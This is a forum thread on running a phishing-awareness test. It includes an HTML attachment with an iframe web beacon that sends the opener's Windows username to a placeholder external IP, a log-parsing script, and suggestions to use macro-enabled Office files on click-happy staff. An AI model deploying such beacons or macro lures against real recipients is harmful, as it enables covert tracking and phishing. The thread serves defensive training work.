need to know when email recipient opened email attachment

maharlika
I want to test our employees to see if they will click on a suspicious email attachment.  I will send it to them from a "throwaway" Gmail account, with a PDF attachment and some kind of explanation that they need to open it to read instructions on delivering a package or something to that effect.  I want to know who actually opens it so that I can do more training for them on security awareness. We use Office/Outlook 365 for email. How can I tell whether or not a recipient opened the attachment?

I like your question; I might try this myself.

Here is how I would do it. You are not going to get a reply from the email program. It is easy to ignore read receipts. So you need the attachment to actually do something.

I created an html webpage with the following code inside it:

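<html>
<head>
<title>Important Information</title>
</head>
<body>
<!-- Requests an image that does not exist on the logging server; the failed request is what shows up in the IIS log -->
<iframe src="http://xxx.xxx.xxx.xxx/%username%.jpg" name="iframe_a"></iframe>
</body>
</html>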

I saved this as important.htm and attached it to the email. My webserver is running IIS and is located at IP xxx.xxx.xxx.xxx (so you will need to change this part of course).

When the user gets the email and clicks on the attachment it opens their browser to view the attached webpage file. In the webpage file it points to an external server (my IIS server) and tries to get an image that does not exist with the name of their currently logged in username. For example when I clicked it I try to get the "Matthew.jpg" file since that is my current Windows account username.

Then I go to my IIS server and view the activity logs. On my IIS I found them under: C:\inetpub\logs\LogFiles\W3SVC1\u_ex160129.log (This directory and file name will vary. Look for the newest modified file.)

Inside the file I see the following entry:
2016-01-29 04:17:08 192.168.3.250 GET /Matthew.jpg - 80 - 64.134.187.49 Mozilla/5.0+(compatible;+MSIE+10.0;+Windows+NT+6.2;+WOW64;+Trident/6.0) 404 0 2 202

Now I know that user "Matthew" tried to open the attachment.
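
The log review described in the answer above, as an added example that is not part of the original post: it reads the `#Fields:` header so the column order does not have to match the quoted line, and it counts only names that appear on a recipient roster. The roster, the `#Fields:` line and every log line except the first are constructed for illustration.

```python
from collections import defaultdict
from urllib.parse import unquote

# Constructed sample in IIS W3C format; only the first entry is the line quoted in the post.
UA = "Mozilla/5.0+(compatible;+MSIE+10.0;+Windows+NT+6.2;+WOW64;+Trident/6.0)"
SAMPLE_LOG = f"""\
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status time-taken
2016-01-29 04:17:08 192.168.3.250 GET /Matthew.jpg - 80 - 64.134.187.49 {UA} 404 0 2 202
2016-01-29 04:19:41 192.168.3.250 GET /favicon.ico - 80 - 64.134.187.49 {UA} 404 0 2 15
2016-01-29 05:02:13 192.168.3.250 GET /jsmith.jpg - 80 - 198.51.100.7 Mozilla/5.0+(Windows+NT+6.1;+WOW64) 404 0 2 31
2016-01-29 05:02:50 192.168.3.250 GET /Matthew.jpg - 80 - 64.134.187.49 {UA} 404 0 2 18
2016-01-29 06:30:00 192.168.3.250 GET /admin.jpg - 80 - 203.0.113.9 python-requests/2.9.1 404 0 2 12
"""
ROSTER = ["Matthew", "jsmith", "akhan"]  # hypothetical list of test recipients


def parse_w3c(text):
    """Yield one dict per request, taking column names from the #Fields directive."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            values = line.split()
            if len(values) == len(fields):  # skip truncated or malformed rows
                yield dict(zip(fields, values))


def beacon_hits(text, roster):
    """Return (opened, unmatched): per-recipient hit summaries and off-roster names."""
    by_name = {name.lower(): name for name in roster}
    opened, unmatched = {}, defaultdict(int)
    for row in parse_w3c(text):
        stem = unquote(row["cs-uri-stem"])
        if row["cs-method"] != "GET" or not stem.lower().endswith(".jpg"):
            continue  # e.g. favicon requests made by the same browser
        name = stem[1:-4].lower()  # "/Matthew.jpg" -> "matthew"
        if name not in by_name:
            unmatched[name] += 1  # scanners or guesses, not evidence about a recipient
            continue
        # Rows are chronological, so the first row seen is the first open (IIS logs in UTC).
        entry = opened.setdefault(by_name[name], {
            "first_seen": f'{row["date"]} {row["time"]}', "count": 0, "ips": set()})
        entry["count"] += 1
        entry["ips"].add(row["c-ip"])
    return opened, dict(unmatched)
```

Roster members missing from `opened` either did not open the attachment or did not produce a matching request, so the result is a lower bound on who opened it.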
Commented:
There's the Safe Links functionality in O365 that does just that, but that's only available as part of the premium ATP offering: https://technet.microsoft.com/en-us/library/mt148491(v=exchg.150).aspx

What it does is very similar to the above, with the benefit of utilizing up-to-date scans of the URLs in question, some basic reporting, etc. But it comes with a price tag :)
The answer from Flashnolan314 effectively describes a basic web beacon. There are various ways they might be used in your scenario, though it's not obvious (to me) how it might be used directly in a .PDF document.

Maybe reading about them in the above link will spark an idea.
My first thought was that perhaps the EICAR Standard Anti-Virus Test File, or more correctly the "string", could be inserted into an attachment to trigger the Anti-Virus software and thereby trigger an alert for you to log.
http://www.eicar.org/86-0-Intended-use.html
http://www.eicar.org/85-0-Download.html

Whether or not this would be blocked by Gmail on its way out, or on its way in to Office 365, is something that you would have to test out.  The very presence of certain types of file containing the EICAR string on a computer can trigger the real-time protection functionality of AntiVirus applications.  A Zip file containing a text file with the EICAR test string usually triggers the antivirus application without even being opened.

Manipulating a PDF file to do something takes you into the realms of malware creation.  Malformed PDF files have been used for a long time to spread viruses, but any responsible systems administrator will have already disabled the more enhanced functionality of Adobe Acrobat Reader where this type of attack is prevented:
http://myonlinesecurity.co.uk/infected-malformed-pdf-attachments-emails/
https://nakedsecurity.sophos.com/2012/04/05/ccittfax-pdf-malware/

My other thought was an attached Microsoft Office document containing a macro that does something (quietly or loudly) to log the fact that it was opened.  The older type of MS Office documents (DOC and XLS) can contain macros without having to have a different extension (DOCM instead of DOCX, XLSM instead of XLSX) which can give the game away.  Any sensible systems administrator will have configured MS Office to either prevent macros from running or force a prompt to allow or disallow.  Conversely, most "normal" computer users in corporate environments are click-happy and would allow macros without thinking.  Perhaps you could use this to your advantage.
